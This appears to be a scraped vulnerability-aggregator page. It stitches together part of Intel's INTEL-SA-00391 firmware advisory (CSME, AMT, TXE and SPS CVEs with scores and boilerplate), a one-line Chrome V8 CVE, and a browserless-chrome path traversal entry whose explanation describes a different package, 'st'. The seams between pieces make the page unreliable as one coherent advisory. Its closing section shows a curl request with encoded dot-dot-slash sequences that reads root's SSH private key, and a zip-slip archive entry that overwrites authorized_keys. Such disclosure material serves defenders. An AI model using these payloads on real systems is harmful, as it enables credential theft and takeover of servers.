Description: Improper input validation in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.3 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

CVEID: CVE-2020-8760

Description: Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L

CVE ID: CVE-2020-12355

Description: Authentication bypass by capture-replay in RPMB protocol message authentication subsystem in Intel(R) TXE versions before 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

CVEID: CVE-2020-8751

Description: Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, Intel(R) TXE versions before 3.1.80 may allow an unauthenticated user to potentially enable information disclosure via physical access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2020-8754

Description: Out-of-bounds read in subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2020-8761

Description: Inadequate encryption strength in subsystem for Intel(R) CSME versions before 13.0.40 and 13.30.10 may allow an unauthenticated user to potentially enable information disclosure via physical access.

CVSS Base Score: 4.9 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2020-8747

Description: Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure and/or denial of service via network access.

CVSS Base Score: 4.8 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

CVEID: CVE-2020-8755

Description: Race condition in subsystem for Intel(R) CSME versions before 12.0.70 and 14.0.45, Intel(R) SPS versions before E5\_04.01.04.400 and E3\_05.01.04.200 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 4.6 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE ID: CVE-2020-12356

Description: Out-of-bounds read in subsystem in Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2020-8746

Description: Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2020-8749

Description: Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 4.2 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

**Affected Products:**

*   Intel® CSME and Intel® AMT versions before 11.8.82, 11.12.82, 11.22.82, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25.

*   Intel® TXE versions before 3.1.80 and 4.0.30.

*   Intel® Server Platform Services firmware versions before SPS\_E5\_04.01.04.400, SPS\_E3\_05.01.04.200, SPS\_E3\_04.01.04.200, SPS\_SoC-X\_04.00.04.200 and SPS\_SoC-A\_04.00.04.300.  
    

The following CVEs assigned by Intel, correspond to a subset of the CVEs disclosed on 12/18/2020 as part of ICSA-20-353-01:

Disclosed in INTEL-SA-00391

Disclosed in ICSA-20-353-01

CVE-2020-8752

CVE-2020-27337

CVE-2020-8753

CVE-2020-27338

CVE-2020-8754

CVE-2020-27336

Note: Firmware versions of Intel® ME 3.x thru 10.x, Intel® TXE 1.x thru 2.x, and Intel® Server Platform Services 1.x thru 2.X are no longer supported versions. There is no new general release planned for these versions.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® TXE, Intel® AMT and Intel® SPS update to the latest version provided by the system manufacturer that addresses these issues.

The Intel® AMT SDK is available for download here. 

Intel has issued a Product Discontinuation notice for the Intel® DAL SDK and recommends that users of the Intel® DAL SDK uninstall it or discontinue use at their earliest convenience.

**Acknowledgements:**

Intel would like to thank Trammell Hudson (CVE-2020-8705), Marius Gabriel Mihai (CVE-2020-12354, CVE-2020-12304), Oussama Sahnoun (CVE-2020-12297), Rotem Sela and Brian Mastenbrook (CVE-2020-12355) for reporting these issues.

The additional issues were found internally by Intel employees. Intel would like to thank Arie Haenel, Aviya Erenfeld, Binyamin Belaciano, Dmitry Piotrovsky, Julien Lenoir, Niv Israely, Ofek Mostovoy, Yakov Cohen and Yossef Kuszer.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/10/2020

Initial Release

1.1

12/30/2020

Revisions to CVE-2020-8705 and affected product versions.

1.2

01/22/2021

Added ICSA-20-353-01 reference

1.3

05/12/2022

Updated Acknowledgments 

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-8745: INTEL-SA-00391

Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

**Chrome Releases**

Release updates from the Chrome team

CVE-2020-16009: Stable Channel Update for Desktop

This affects versions of package browserless-chrome before 1.40.2-chrome-stable. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server.

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

*   **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

    curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
    

**Note** %2e is the URL encoded version of . (dot).

*   **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

    2018-04-15 22:04:29 .....           19           19  good.txt
    2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Tag

#chrome